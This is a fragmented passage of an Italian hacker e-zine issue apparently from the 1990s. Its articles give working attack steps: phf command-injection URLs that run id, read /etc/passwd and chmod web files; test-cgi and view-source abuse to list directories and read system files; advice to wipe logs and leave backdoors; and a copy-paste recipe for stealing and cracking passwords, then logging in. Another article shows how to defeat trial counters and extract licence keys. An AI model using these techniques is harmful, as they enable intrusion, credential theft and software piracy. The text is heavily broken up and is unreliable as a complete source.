...attenti alle kazza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USER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LENGT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 caso in cui il server in questione utilizzi NCSA.. se invece si tratt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che cambia solo il campo SERVER_SOFTWA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i' com'e', questa schermata e' completamente inutile, ma, se questa CGI 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gurata nel modo giusto, scrivendo http://www.sito.com/cgi-bin/test-cgi?/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ha una sorpres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I/1.0 test script repo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gc is 1. argv is /\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SOFTWARE = NCSA/1.4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NAME = www.sit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EWAY_INTERFACE = CGI/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ROTOCOL = HTTP/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ORT =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EST_METHOD =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_ACCEP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INFO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TRANSLATE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_NAME = /cgi-bin/test-c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Y_STRING = /a /bin /boot /bsd /cdrom /dev /etc /home /lib /m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root /sbin /stand /sys /tmp /usr /usr2 /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HOST = remote.machin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ADDR = 255.255.255.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USER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LENGT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 campo QUERY_STRING e' apparsa la lista delle directory presenti in roo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ltre parole questo script ci permette di esplorare tutto l'hard disk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, una cosa essenziale se si vuole valutare la posizione dei file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 o verificare quali comandi possiamo utilizz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 esempio se vogliamo vedere quali altri script CGI sono presenti, possi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v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sito.com/cgi-bin/test-cgi?* e otten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I/1.0 test script repo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gc is 1. argv is \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SOFTWARE = NCSA/1.4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NAME = www.sit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EWAY_INTERFACE = CGI/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ROTOCOL = HTTP/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_PORT =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EST_METHOD =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_ACCEP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INFO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_TRANSLATE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_NAME = /cgi-bin/test-c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Y_STRING = calendar cgi-archie cgi-calendar cgi-date cgi-f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i-fortune cgi-lib.pl imagemap imagemap.cgi imagemap.conf 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-query mail-query-2 majordomo majordomo.cf marker.c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u message.cgi munger.cgi munger.note ncsa-default.tar post-qu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y smartlist.cf src subscribe.cf test-cgi up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HOST = remote.machin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ADDR = 255.255.255.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_USER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TYP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_LENGT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cco cosi' tutto quello che possiamo usare per i nostri scopi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-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script e' studiato per fare ammirare a un computer remoto le bellez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ute in un qualsiasi file del sistema.. vi chiederete, ma a che co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 se non per hackerar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la domanda che spesso si pongono gli amministratori che vedono questo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giro per le proprie directory.. sara' dunque molto raro che poss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ilizzarlo.. solo i piu' minchioni installano questo script senza chieder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perche', la maggioranza hanno quel pelo di intelligenza che gli serve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ire che un simile file sull'hard disk e' come puntarsi un fucile su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 con http://www.sito.com/cgi-bin/view-source?/etc/passwd potr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trovarvi con l'elenco degli account, con relativa password criptata, s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stro schermo... e se a questo punto non sapete cosa fare, vi consigli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re il mio precedente articol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che sto per descrivervi e' il bug piu' famoso e potente a disposi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un hacker..(o almeno lo era fino a poco tempo fa).. il phf e' uno scri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le CGI dell'Apache inizialmente congegnato per gestire alcuni servizi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 da computer remoti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ramente non so che tipo di servizi offra, ma sono sicuro che su c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lte che qualcuno ha utilizzato il phf, 90 erano per scopi illeciti e fuo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 suo vero impieg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a permette di fare questo script: semplice permette di utilizzare g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e dei comandi Unix come se si stesse operando sulla tastiera del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colpire.. vi sembra poc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sito.com/cgi-bin/phf/?Qalias=x%0aid con questa riga sul vos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wser chiedete al phf di lanciare il comando id che vi permettara'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pere quali sono i vostri privilegi sulla macchina in questi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 sono diverse modalita' di rispos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QUERY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usr/local/bin/ph -m alias=x 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id=65534(nobody) gid=65535(nogroup) groups=65535(nogro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a ad esempio dice che il phf setta i vostri privilegi al minimo, d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ete un po' con le mani legate.. nonstante tutto pero' potete fare d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e che un normale user con simile uid potrebbe non fare..esempio veder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passwd c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sito.com/cgi-bin/phf/?Qalias=x%0acat%20/etc/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 dipende come e' impostato il phf.. potrebbe anche succedere che vi neg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ccesso a questo file, allora possiamo solo cercare di scoprire cosa c'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questo compute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 esempio ottenendo la lista di tutte le directory e i privilegi ad e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sito.com/cgi-bin/phf/?Qalias=x%0als%20-al%2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ure cercando nei file di log eventuali informazioni utili, come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tte al posto del login, memorizzate pronte per essere sfruttate (cap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atti che per la fretta, a volte, quando appare la scritta login: si pr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io e in password poi si scrive il login.. ovviamente il server rifiuter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ingresso e richiedera' il login: dove l'ignaro utente scrivera' la password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vandola cosi' nel file di log tipo /var/adm/messag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avrete ormai capito dopo il %0a potete infilare qualsiasi comando che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ga in testa... spesso pero' quelli di scrittura com cp, ren, rcp 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ilitati, dunque il phf viene sfruttato piu' per recuperare informa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per modificare l'hard disk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 pero' alla richiesta di ID app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QUERY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usr/local/bin/ph -m alias=x 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id=0(root) gid=0(ro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cose cambiano.. qui operiamo come Super User e abbiamo l'accesso garant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alsiasi file.. la prima cosa da fare e' scaricarsi il passwd, segu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ari da inetd.conf per cercare tutti i possibili modi di accesso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tiamo per esempio che siate riusciti a scaricare il file passwd, do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rlo decriptato avete scoperto qualche password di utenti comuni, sen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vilegi.. non riuscite cosi' ad avere accesso a directory con i files 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volevate modificare.. invece di perdere tempo a decriptare account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id piu' alti, un po' di intelligenza suggerisce di utilizzare il phf assi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chmod per cambiare i permessi di un file o di una directory.. rendendo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vibili da tutti gli use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gi-bin/phf/?Qalias=x%0achmod%20a%2brw%20/www/do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 corrispond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mod a+rw /www/do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ome vedete gli spazi e il + sono caratteri speciali da immettere tram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ice ASCI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connettete con ftp, cambiate il file scelto e poi con phf riportate tu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era prima, possibilmente cancellando i log file. Ricordate che un si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dimento funziona anche con il file passwd e inetd.conf.. lasciare qual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doors e' sempre utile (anche se rende l'attacco un po' spudorat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ggi capita che alla richiesta di utilizzo del phf appaia la scritt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mile, you are on candid ca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una evidente presa per il culo che viene inserita nelle nuove versioni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 Apache.. tanto per rifarsi della pertida di immagine dovuta prop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bu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concludere esistono molti altri script che possono tornare utili a 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ca di penetrare in siti www, ad esempio alcuni che inviano mail pos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re utilizzati per recapitare nella propria casella postale il file passw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tanti altri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diamo se riesco a rimediare qualche novita' per il prossimo numer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Jack McKr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ZIONE - Seguira' ora un altro articolo di Jack Mckrak sulle conseguen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gli algoritmi frattali nella decriptazione delle password. Il test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e e' frutto totalemte della mente deviata di McKrak, dunque sapp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on esistono prove che quello che sta scritto qui di seguito abbi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o.. anzi forse non ce l'ha propri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 se siete interesati all'argomento o volete solamente sapere cosa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ma MK prima di concepire questi pezzi, scrivete a mckrak@psynet.ne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Articolo Teorico/Cannato - Ordine e Password ( by Jack McKra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l'e' la differenza fra ordine e disordine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amo dire che un insieme e' ordinato quando esiste una logica che le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gni suo elemento.. quando, insomma, posso affermare che quell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ata cosa deve stare in quel posto e non da un'altra parte. Un mazz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carte ordinato e' quello dove si va dall'asso al K in success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scente, mentre in uno disordinato ad ogni carta ne puo' seguire un'al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on centra assolutamente niente con la prima.. E' ovvio affermare che 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to piu' facile cercare una cosa in un insieme ordinato che in u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ordinato.. cercando un libro, ad esempio, istintivamente andiamo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ore che ci interessa, perche' presupponiamo che chi ha ordinato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blioteca abbia seguito un criterio per facilitarci il compito.. la log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ra ci fa concludere che dopo dieci libri di fantascenza, con mol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ilita, ce ne sara' un altro dello stesso gener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do l'ordine e' palese non ci sono dunque problemi.. ma quando non e' cosi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ese? Ad esempio.. per mia mamma la mia camera e' l'apoteosi d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usione, ma io ci trovo tutto... quando invece lei decide di mette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ine ecco che io non piu' riesco a capire dove sono finite le m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rieta'. Questo accade perche' i miei genitori non capiscono la log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sta dietro alla disposizione degli oggetti sul pavimento e nei cassett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lando tutto con il termine disordine.. ma allora esiste il caos o e'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nostra incapacita' di schematizzare dati complessi ? Che ci sia una sen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e dove non avremmo mai immaginato di trovarl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ndiamo la serie di numeri 2 4 6 8 10.. ovviamente se ci chiedessero qu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ero viene dopo noi risponderemmo con 12, poiche' banalmente si tratt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succesione di numeri pari.. la successione 2 3 5 7 11.. sarebbe gia' pi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ssa e solo dopo aver capito che si tratta di numeri primi potremmo d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il seguente e' il 13.. in fine la serie 52 63 94 46.. risulterebbe casu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non si capisce che sono i quadrati di 5 6 7 8 con le cifre invertite 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ero seguente sarebbe allora il 18 (9^2 = 81).. Un insieme apparente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uale dunque puo' avere una suo schema, anche complicatissimo, ma ch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perto puo' metterci in condizioni di dare un senso a tutti i dati incotra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anche a quelli futuri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 algoritmi come il PKZIP, ARJ, RAR sono specializzati proprio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ercare ordine nelle sequenze casuali di byte, in modo da poter scriv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 file compresso solo i byte realmente indispensabili per otten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originale... Per eseguire questo compito cercano stringhe che si ripet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u' volte all'interno del file e poi reiterano questo processo finche'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finale non e' possibile trovare sequenze ripetute.. Non e' un met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icato, ma, come tutti possono sperimentare, permette di ridu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ecchio i megabyte accupati da un programma generico. Ultimamente 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rgendo un nuovo tipo di compressione.. la compressione FRATTAL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 trovate file con l'estensione FIF sono proprio immagini compresse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sistema). Questa compressione si basa su procedimenti matematici mol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ssi, ma il nocciolo della questione e' che un file viene riassunto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numero limitato di equazioni a cui e' associata una probabilit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 momento dello scompattamento il file viene rigenerato seguendo qu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zioni che assumono piu' o meno importanza a seconda proprio d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ilita' a loro conness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averne un'idea non so se avete mai visto il programma in Pascal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"Felce", che tramite 4 equazioni riproduceva sullo schermo la figur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foglia di felce.. in questo caso, ad esempio, da poche' centinaia di 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ottieneva un disegno che occupava diverse decine di K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compressione frattale e' dunque molto potente, anche se parecchio le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a fase di scomposizione in equazioni (e questo e' il suo princip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a) e rappresenta dunque il miglior metodo oggi disponibile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are ordine in dati apparenetemente casuali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chiederete cosa centra tutto questo con le password.. passiamo ora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o del discorso..  Se prendiamo un insieme abbastanza vasto di par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ave, usate regolarmente in un paese o anche in tutto il mondo, notia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on e' un insieme completamente casuale, difficilemte si poss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are parole come "hhhh!!!" mentre abbondano quelle tipo "Mario1"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iav0\0".. e ho citato due password fatte con un pelo di graz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lasciando quelle con parole comuni e regolari che non dovrebbero nean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re concepite, ma che spesso abbondan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insieme di questo tipo non e' completamente casuale (tecnicament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tore disordine di un sistema viene defininito "grado di entropia")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amo allora pensare di applicare un algoritmo frattale a un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tutte queste parole e ottenere delle equazioni che esprimano l'essen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tutto l'archiv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 siamo in grado di rivoluzionare il concetto di decriptazione a for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ta (ovvero quello di si provano tutte le parole possibili) poich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nostre equazioni non solo sono in grado di controllare tutte le par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l'archivio originale, ma possono essere spinte oltre e trasformarsi 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lior generatore di password esisten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ando infatti questi riassunti in forma matematica oltre quello che ser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ottenere il database iniziale si arriva alla creazione di password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erano presenti nell'elenco originale ma che sono legate a quest' ulti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a propria essenza strutturale.. Nessun metodo statistico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estrapolazione dei caratteri comuni o la creazione di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like potrebbe competere con un simile programma.. almeno in teori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tempo per decriptare un file passwd, ad esempio, si ridurreb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rmemente.. tranne nei casi in cui un eventuale operatore conosca q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odo e utilizzi le equazioni sopra descritte per creare password fuo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ema.. che cosi' non potrebbero essere mai scoperte in un tempo uman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tto quello che ho scritto sono pero' estrapolazioni teoriche, in pra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se questo programma potrebbe non essere mai creato.. in primo luo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he' gli algoritmi di compressione frattale sono segreti e ancora non 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conosce bene la potenza, poi bisognerebbe disporre di un archivi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 estremamante ricco, e tanti altri motivi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issa' se poi alla fine questo sistema sarebbe davvero efficente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Jack McKr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.S. Parlando delle succesioni numeriche mi e' tornato alla ment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cchissimo gioco matematico, che probabilmente vi e' stato gia' fatto t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etro... per chi non lo sapasse e' la storia di un tipo che vuole entr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un castello (UNIX) dove e' necessario conoscere la risposta ad un quest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guardiano (login-password).. il tipo si nasconde e ascolta tutte qu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dicono le persone che entrano (sniff)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primo che bussa al portone il guardiano dice "6" e lui risponde "3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pass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secondo tipo dice "8", lui risponde "4" e pass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terzo "10" , risponde "5" e pass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quarto "12", risponde "6" e pass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esto punto il tipo pensa di aver capito la logica e bussa al porton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guardiano gli dice "14" lui risponde "7", ma viene fucilato... perch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numero avrebbe dovuto dir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sapete la soluzione scrivete a "mckrak@psynet.net".. se avete indovin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everete nientemeno che la foto del Dr.Creker mentre narcotizz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iziotto strigendogli la faccia fra le sue ascel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I siti del Dr.Creker ( by Dr.Creker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ao a tutti, o miei cari lettori ;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iamo insieme un po' di belle pagine che vi tengano compagnia dur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lle tristi serate in cui non c'e' nessuno sul vostro irc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ferito e la vostra donna e' uscita con le amich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freeside.com/phrack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so' come ho fatto a non citarlo negli articoli che ho gia scritto com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e' il sito dove potete trovare Phrack...un gran bel giornale direi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ateci. Non aggiungo altro. DA VEDER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phila.geek.org.uk/phila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pagina carina; qualche bugs, qualche altra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sante se non avete niente di meglio da fa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dire: c'e' di meglio, c'e' di peggi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digicrim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nome dice tutto. Andatec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fs009mi.iol.it/decoder/hom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4.iol.it/deco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page della rivista italiana decoder (ultimamente criticata per alcu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agini pubblicate). Ho letto qualche numero e mi e' sembrato mol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sante. Dategli un'occhiata potrebbe prendervi piu' di qua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si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ilf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un bel sito che ho trovato per sbaglio tra i bookmarks vecchi di Inf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. Cosa volete che vi dica? Andateci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e per questo numero ho concluso. Ci risentiamo prest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ez! See Ya!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.Cr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ortiamo, come gia detto, il primo degli articoli scritti da voi che legg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testo e ci auguriamo che in futuro questo spazio possa diventare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grante della rivista cosi' come lo sono tutti gli altri artico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Guida alla Sopravvivenza per non-crakkatori (by Cavallo de Cavall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si sputtanano le protezioni dei programmi senza essere veri crakkat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anzitutto premetto che questo articolo non e' forse il classico artic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SyStEmDoWn, non e' approfondito, non e' fatto da un mago dell' H/C/P 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scritto da un ragazzo con una conoscenza media del PC e che ama divertir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esso. Quindi se ritenete cio' che ho scritto delle boiate assurde, v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i guru del crack, avete ragione!! Anzi diciamo cosi', se siete ve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kkatori o gente gia' abbastanza esperta non leggetelo neanch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fortunatamente non sono un crakkatore, sto cercando di diventar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razie Xoanon per la guida !!) ma non lo sono ancora, questa mia stori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indirizzata a coloro che, a volte, nei canali IRC domandano crack per q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quel programma e magari senza sapere cosa sono i file .INI o il Registr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'95 o i files di install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utti puo' capitare di trovarsi di fronte ad un programma che, sfiga vuo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suno conosce, nessuno ha visto, nessuno possiede il crack relativo :(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scopo di questo articolo e' far capire come, a volte, non serva parla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embler, non serva saper smanettare con il Soft-Ice o disassemblare c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32dasm per fottere un programma, basta un po' di intuizione e una d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ccia di CU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, adesso vediamo tre esempi di come a volte e' facile aggir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ompletamente o in parte) una protezione senza essere veri crakkatori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 programmi molto probabilmente non vi saranno affatto familia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emp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File .INI: TcpSpeed v1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Registro di Win95: Kiplinger Small Business Attor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Files di Installazione: CAD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ziam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File .INI: TcpSpeed v1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rogramma TcpSpeed e' una piccola utility che permette di misurare l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locita' di collegamento con un sito che voi specificato. L'ho trov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 un sito H/C/P (boh chissa' perche') e non e' che mi abbia esaltato trop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atti non funziona con tutti i siti ma solo con alcun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 vediamo che limitazione h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za dirvi nulla (o almeno nella mia versione non c'erano files che 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egavano) il programma vi permette di utilizzarlo solo 10 volte + o -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 il maledetto cerca di collegarsi al suo server per cercare di registar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ra vediamo un po' se ha un contatore, dovra' pur salvare da qualche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numero di avvii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 allora si puo' cercarlo prima nei file .ini che e' la cosa piu' semplic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anzitutto breve excursus sui file .ini (forse non tutti sanno cosa sono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file .INI sono dei file di inizializzazione che contengono informazio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ive ad un programma, per esempio la posizione della finestra, gli ulti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aperti, e guarda un po' a volte i contatori o le registrazion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trovano nella directory di Win95 (ma a volte file con l'estensione .ini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sono trovare anche nelle directory dei programmi) ed hanno di solito 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sso nome del programma relat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istono anche dei file .INI relativi a  Windows 95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.INI dove si puo' trovare il tipo di stampante, lo sfondo, le imposta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r l'italia etc... e magari informazioni sui programmi (es. WinZ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.INI dove ci sono i settaggi di sistema: tastiera, scheda video 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mente consiglio di controllarli sempre tutti, per essere sicuri,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controllare anche tutti i file nella directory del programma (per ved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salva il valore da qualche parte li' magari in un file con un nome cazz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nascost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questo programmino ci va proprio alla grande, nel file Tcpspeed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'e' proprio la linea Run Count= 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ate ad avviare il programma 1 volta, riguardate il file .ini e trover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e' cambiato in Run Count = N+1. Quando N = 10 il programma decide che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te provato abbastanza e non va piu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n fate altro che andare nella directory di Win95, aprite Tcpspeed.ini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cate il contatore riportandolo a 0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viamente e' una cosa un po' grezza e provvisoria ma sempre megli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nte o n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RIMENTO DA PARTE DI BLINKING: Il mio caro compare suggerisce di sett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file tcpspeed.ini READ ONLY cosicche' il programma non riesca a port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nti il contatore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Registro di Win95: Kiplinger Small Business Attor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suddetto programma non e' molto interessante per il mercato italiano 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 comunque degli spunti interessanti; lo classificherei come un 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or che guida alla composizione di garanzie (non avvisi!!), lett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rdi pre-matrimoniali, testamenti (tie'!!) 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figa vuole che da dove l'ho recuperato non c'era il crack e penso di sap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he' mancava: la prima volta che avviate lo SBA dopo l'installazione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a parte tranquillamente, il problema e' che alla 2nda volta vi chie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 registrarlo e vi concede 3 avvii senza codice di registrazione (come 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 incazzare la gente che distribuisce warez senza provare a fondo la roba!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controllo dei file .INI non porta da nessuna parte e adesso come si fa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l'avvento di Windows '95 (evitiamo commenti sul sistema operativo)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ta di molti giornali, i file .INI sarebbero dovuti scomparire per lasci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zio al fantomatico Registro di Configurazione. Effettivamente il num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questi file si e' ridotto e, oggigiorno, accade spesso che i settag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i programmi siano messi tutti in questo Regis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chi non lo sapesse (e penso che ce ne siano) per vedere il registro b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tare nella finestra Esegui... il comando Regedit e cosi' vi ritro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'Editor del Registro di Configur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esso piazziamo una ricerca (Modifica..Trova) su Attorney e vediamo un po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succed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hm sotto HKEY_CLASSES_ROOT mi ha trovato Kiplinger's Small Business Attor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moci una occhiata: premiamo sul + di fianco e  compare la chiave frIn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chiamo su di essa e nella finestra di destra comp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ab|   predefinito  "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ve N e' un num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e proviamo a rieseguire il programma, poi torniamo qui e scopriamo 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 e' diventato N-1. La faccenda si fa interessante: proviamo a mettere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avviamo il programma, adesso dovrebbe dirci che ci sono rimasti 10 avvii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chissa' che succede se ci piazzo un bel 1000 ????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altro programma fottu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Files di Installazione: CADRA v10.0.1 per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ora, con un po' di orgoglio (si ditemi pure che sono un esaltato ed u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ndi ma questa lavoretto mi fa godere come un porco) la mia Ope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 cosa: cusale' l Cadra ? (trad. cos'e' il Cadra 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oanon scrive in livornese e io in varesott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Cadra e' un CAD (Computer Aid Design), cioe'  un programma di diseg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nico tipo AutoCad x intenderci, prodotto dall'Adra e venduto alla mod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fra di 10 zucche + o - (come ogni cad che si rispett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 cosa : sa te fe cuse' dun Cad che l'e' minga famus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rad. cosa te ne fai di un Cad che non e' famoso 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usa mio pa' al lavoro e volevo dargli una mano da ca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za cosa: che protezione ha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a domanda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ticamente legge qualcosa dal Bios del PC, vede le opzioni del Program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volete attivare e la data in cui scadra' la licenza, legge la chi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el formato XXX-XXXX) confronta il tutto e bum: la licenza che av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rito e' scorret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ta cosa: ma non potevi copiare la licenza di tuo pad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h no, cosi mi deludet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 detto che legge dal Bios quindi ogni PC e' diverso dall'altr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 ora fottiamo questa protezione da 10 zucch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servando bene bene il setup si scopre che la licenza va configur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all'interno del cad ma dal setup. Interessan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e' mai capitato di dare una occhiata a quei file chiamati setup.l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inf e setup.mst? No? Male! Dovreste! Come dice mio nonno bisog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pre OSSERVARE e CAPIRE il mondo attorno a noi! (Meditate gente Medit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n tutti i programmi li hanno, dipende dal tipo di installazione, quel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ti con l'InstallShield no e sfortunatamente ora ne fanno tanti di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quell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 illustro velocement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lst : informazioni generali tipo titolo finestra, file necessari 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Inf : contiene l'elenco di tutti i file che verranno installati (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o modifico quando copio un programma e voglio tagliarci da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stallazione magari 20Mb di Immagini inutili senza far impast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'installazi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mst : il file veramente interessante, la sua descrizione presa dal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e' questa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Setup script for Cadra for Windows. Written in MSTEST Ba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is code is rather tightly coupled to setup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 bene e' lo script di installazione scritto in una specie di Basic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ene le info sulle procedure di installazione (tipo se schiaccio q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ccede quest'altro). Attenzione la 2nda linea ci dice che il file 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ppiato con il file setup.dll (Cio' e' importante perche' i messaggi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ngono visualizzati vengono presi dalla dll, io ho dovuto modific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talmente la DLL per far inserire i miei commenti nel setup trasformat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tore di Licenze ma non e' importante per ottenere le licenz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ra apriamo questo script e facciamo una ricerca con License, Regis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ration, Incorrect, Lic ,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viamo un po' di cose, con un po' di pazienza becchiamo la routine gius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sLicKeyValid -- Returns true if number is leg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oe' se la licenza inserita e' giusta riporta True (vero) (e' quindi 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o booleano VERO/FALSO; per maggiori infos leggete un libro di matema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di programmazi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, avanti cosi'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olliamo un po' la routine fino a che, to' guarda qui, troviamo un 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(bufkey$ = n$) THEN IsLicKeyValid =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LP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eghiamo un po' per i non-programmato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 la stringa bufkey$ e' uguale a n$ allora IsLicKeyValid e' vero (cio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biamo inserito la licenza gius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pre Meglio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ndi, probabilmente ci sarete arrivati, una stringa e' quella che ho mes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a caso e l'altra quella giusta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era' visualizzare le 2 stringhe per vedere quella mia e quella giusta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ra, siccome non so programmare in MSTEST BASIC cerco la fun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visualizzare un messaggio, la scopiazzo spudoratamente e ci faccio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eve modif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esempio quest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$ = "The drive letter is missing or invalid. Please enter a valid dr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% = DoMsgBox(t$,"Cadra for Windows Setup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 visualizza un messagge box con scritto il contenuto di t$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la piazzo prima di If.... modificata cosi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% = DoMsgBox("La chiave corretta e': " + bufkey$,"Sprotezione Effettuata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allo de Cavallis", MB_OK + MB_ICONEXCLAMATION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.S. Io so gia' che bufkey$ e' quella giusta, avrei dovuto prima mett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e 1ma chiave e' "+ bufkey$ + " la 2nda e' " + n$ , osservarle, capire qu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a quella giusta.. comunque ci siamo capi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 riavviate il setup cosi' modificato ed eccovi visualizzata la chi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usta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.S. Fatevi una copia di backup dei file PRIMA !! Non vorrete perdere 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rogramma per un errore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 ho concluso la mia piccola guida alla sopravvivenza per non-crakkat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ro di aver aiutato qualcuno, di non aver deluso nessuno, di non aver fa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azzare nessun vero crakkatore (Se vi ho fatto inkazzare, fatemi un cor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ckin oriented cosi' faccio cose piu' interessant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razio InfectedMachine e lo staff di SyStEmDoWn per avermi permess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rire questo mio articolo, Xoanon per la sua guida al crack (se mi des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e lezioni non sarebbe male :)), pa' e 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utoni a tutti gli amici dei canali #hackers.it #hackita e #warezita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za i quali non avrei neanche saputo dell'esistenza di System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O AVVI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e' sempre facile trovare protezioni come quelle descritte, saranno mag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5% o anche meno, ma ricordatevi Provate Provate Provate, puo' darsi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l'inventiva si arrivi dove non arrivano le conoscen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allo de Caval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ratamatta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Consigli per il laming ( by Han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ve, questa sezione di Systemdown sara' (forse) snobbata da molti. Non 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terro' offeso da un tale atteggiamento solo perche' so che verra' com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ta, magari di nascosto.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he' un articolo di cosi' basso livello? In una cosi' bella rivista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risposte possono essere diverse: la prima e' che sono un gran l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, per scimmiottare i pirati veri, mi occorreva una pubblicazion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altra e' che frequento hackers.it su IRCnet e su quel canale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mulano tante di quelle esperienze sul laming da fare schif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ancora: molti di noi (noi lamers) vorrebbero iniziare a molestar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i remoti partendo da conoscenze pressocche' nulle, e da quella merda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1N95 (a proposito un buon lamer parla male di win95 anche se conosce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l S.O. anzi la cosa migliore e' usarlo con lo sfondo pieno di scritte tip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IcR0z0fT SuX" ecc., sono fondamentali anche i caratteri cosi',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olare il 3 al posto della E e lo 0 al posto della O) ma spesso ci vi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g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ke (la K al posto del ch) questa soddisf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domanda piu' frequente che pone un lamer e': "come si diventa hacke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risposta piu' frequente che riceve: "installati linux... e qu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ari ne riparliamo...", in genere chi risponde cosi' e' uno molto pi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mer dell'interlocutore, ha una slack v.1.2.xx installata malissimo e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esce neanche ad avviarla... la risposta corretta e': "inizia a truccarti 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orino: e' fare hacking anche quello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unque... veniamo al dunqu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la serie "ce volemo diverti' ppure noi" vediamo cosa si puo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are con un wINd0z3 e un pentium (o anche meno) ed una sempliciss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ssione a 33.6 con tin o iol (o anche meno I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prima cosa vi occorre qualche programma (non rompete col reperimen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te qualche motore di ricerca!!!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n browser (Netscape va benissimo, i.expl. un po' meno: mIcR0Z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X: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John (o jackpot o starcrack o altri ancora per decriptare le pw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n Port Scanner (Netcop o similare per analizzare le por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n client telnet (CRT e' uno dei migliori ed e' freeware(?) ci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OANON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amo all' azi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iste un vecchio bug nella sicurezza delle macchine collegate in re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to conosciuto, ma che, essendo i sysop anch'essi dei lameroni, in qual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o  funziona ancora egregiamente, in particolare quelli con dominio .it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rite il vostro browser, col mouse selezionate l'area dove comp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url (eheh sembro un manuale PCfacile:) e digitate, senza pensare cosa pos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ler  dire, anzi non digitate neanche...fate un copia e incolla che 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u'semplice, con questa FORMULA MAGIC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domainchevogliohackerare.com/cgi-bin/phf?Qalias=x%0a/bin/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20/etc/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mente sostituite il www.ecc.. (siamo lamerZ ma non aprofittiamone..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il sito e' un po' curato, e il sysop legge phrack, vi dovreb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ire uno squallido FILE NOT FOUND o una bellissima scritta ACCESS DENI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ol dire piu'o meno lo stesso ma e' molto piu' c00l (o keWl) da raccont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li amic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chi gestisce il sito e' lamerazzo peggio di voi, e legge Il Tromb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vrebbe apparirvi una pagina di testo con delle scritte stra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kio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llo e' il file delle passwords: salvatelo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 datelo da mangiare al vostro cracker preferito (john p.e., per l'u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rimando a numeri precedenti di systemdown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do avete ottenuto la pass di un superuser, avviate il vostro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ner preferito, puntato sull'url akkato in precedenza, dovrebbe darvi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a con circa una quindicina di numeri (le porte:)), segnateli i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-it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 avviate il client telnet inserite il dns, indirizzatelo su ognun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i numeretti del post-it e iniziate a premere invii, punti di doman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trlA-Z, ctrl0-9 e tutto quant'altro vi viene in mente, finche' non vi app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a maschera con scritto USER: o LOGIN:...Qui inserite il login e la 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enuti in precedenza e... BING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ete dentro! ovvero siete dei VERI HACKERS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mparare cosa sia una shell o un daemon e come funzionano e' un al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rso, ma voi fregatevene... ormai siete r00t in un altro sistem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ete dirlo in IRC, dedicargli una home page, spararlo nelle new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contarlo sul vostro BBS, scriverlo sui muri, ec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... se avete resistito sino a questo punto (della lettura inten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bito che riusciate ad andare oltre (nel sistema remoto intend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o' se, sempre come prevedo, riuscirete a fare qualche inutile dann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perlomeno a farvi tracciare, c'e' la speranza che vi arrestino cosi'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po' state lontani da internet e dal modem, il che' non puo' farvi (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ci) che bene, senza contare che poi, con un po' di fortuna, quando usc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galera, vi chiama Maurizio Costanzo o Format e vi fanno vedere in TV,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puntata dedicata alla pedofilia in r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se e' meglio continuare a fare i lamerZ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medi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ao a tutti e... happy hack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zi ...bYeZ e happy laming!!!! :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h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utore di questo articolo e' a vostra completa (si fa per d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osizione su IRCnet oppure sulla casella pittiga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 poco il pgp e solo per messaggi sovversivi tipo "hAi il cRacK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1gp2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pensa che chi si sente un po' preso per il fondo da qu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blicazione non abbia sense of humor, ma solamente tanta rag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raziamen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levo fare un solo ringraziamento dedicato a tutti coloro che ci leggono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ci incoraggiano ad andare avanti e che, con il loro appoggio ci han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ntito di arrivare fino a questo num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oltre vorrei ringraziare sia Cavallo de Cavallis sia Hank per avere scri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i' velocemente i loro artico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penso sia necessario aggiungere al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chiudere questo numero vorrei invitare tutti coloro che sono arrivati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re queste righe di conclusione a scrivere articoli anche semplici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darceli per poterli pubblicare nel nuovo spazio a voi dedica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 articoli ( se mai ne dovessero arrivare piu' di uno ) verranno pubblica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ine, per cosi' dire, di arrivo... a meno che non vi siano trop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coli sullo stesso argomento che farebbero risultare monotono q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stro angolo; quindi prima magari di scrivere un qualche tipo di artic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to simile ad uno gia presente pensateci su'...le idee, sono sicuro,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'altra cos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 era venuta la curiosita' di sapere quanti siete la' fuori nel mond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 che leggete questo testo e vi invito ad inviare alla mail del Dr.Cr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alla mia una semplice lettere con nel subject la scritta "prova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avete voglia fate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do questo quarto numero riportando un testo che tutti dovrebb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oscere; fino a ieri era in lingua inglese ma oggi lo abbiamo tradotto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 con quella lingua non ha molto a che fare... ;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edo scusa in anticipo per gli eventuali errori di traduzione o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nsione. Ringrazio Xoanon e RaggedRobin per l'aiuto che mi hanno forn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R MANIFESTO    ++The Mentor++ ( The Mentor's Last Word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 e' stato arrestato un altro oggi, e' su tutti i giorn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agazzo arrestato per crimine informatico", "Hacker arrestato dopo esser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iltrato in una banca"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nati ragazzini. Sono tutti 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 avete mai, con la vostra psicologia da due soldi e il vostro tecno-cerv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anni 50, guardato dietro agli occhi del Hack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vi siete mai chiesti cosa abbia fatto nascere la sua passione? Qu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za lo abbia creato, cosa puo' averlo forgiat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sono un hacker, entrate nel mio mond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mio e' un mondo che inizia con la scuola... Sono piu' sveglio di mo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ri ragazzi, quello che ci insegnano mi annoi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nato sottosviluppato. Sono tutti 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sono alle Junior High, o alla High School. Ho ascoltato gli insegnan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egare per quindici volte come ridurre una frazione. L'ho capito. "No, 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th, io non mostro il mio lavoro. E' tutto nella mia test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nato bambino. Probabilmente lo ha copiato. Sono tutti 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 fatto una scoperta oggi. Ho trovato un computer. Aspetta un momento, q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' incredibile! Fa esattamente quello che vogl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commetto un errore, e' perche' io ho sbagliato, non perche' io non g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cci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perche' si senta minacciato da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perche' pensi che io sia un cogli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perche' non gli piace insegnare e vorrebbe essere da un'altra par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nato bambino. Tutto quello che fa e' giocare. Sono tutti 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 e' successa una cosa...una porta si e' aperta su un mondo...corre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raverso le linee telefoniche come l'eroina nelle vene del tossicomane,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ulso elettronico e' stato spedito, un rifugio dagli incompetenti di og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orno e' stato trovato, una tastiera e' stata scoper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Questo e'...questo e' il luogo a cui appartengo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conosco tutti qui...non ci siamo mai incontrati, non abbiamo mai parl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cia a faccia, non ho mai ascoltato le loro voci...pero' conosco tut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nato bambino. Si e' allacciato nuovamente alla linea telefonica. Sono tut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 potete scommettere il culo che siamo tutti uguali...noi siamo stati nutri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cibo da bambini alla scuola mentre bramavamo una bistecca... i pezzi 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bo che ci avete dato erano gia stati masticati e senza sap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 siamo stati dominati da sadici o ignorati dagli indifferenti. I po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avevano qualcosa da insegnarci trovavano in noi volenterosi allievi, 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e persone sono come gocce d'acqua nel deser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 e' questo il nostro mondo...il mondo dell'elettrone e dello switch,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ezza del baud. Noi facciamo uso di un servizio gia esistente che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erebbe nulla se non fosse controllato da approfittatori ingordi, e v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 chiamate criminali. Noi esploriamo...e ci chiamate crimin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 cerchiamo conoscenza...e ci chiamate crimin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 esistiamo senza colore di pelle, nazionalita', credi religiosi e c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amate criminali. Voi costruite bombe atomiche, finanziate guerre, uccide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gannate e mentite e cercate di farci credere che lo fate per il 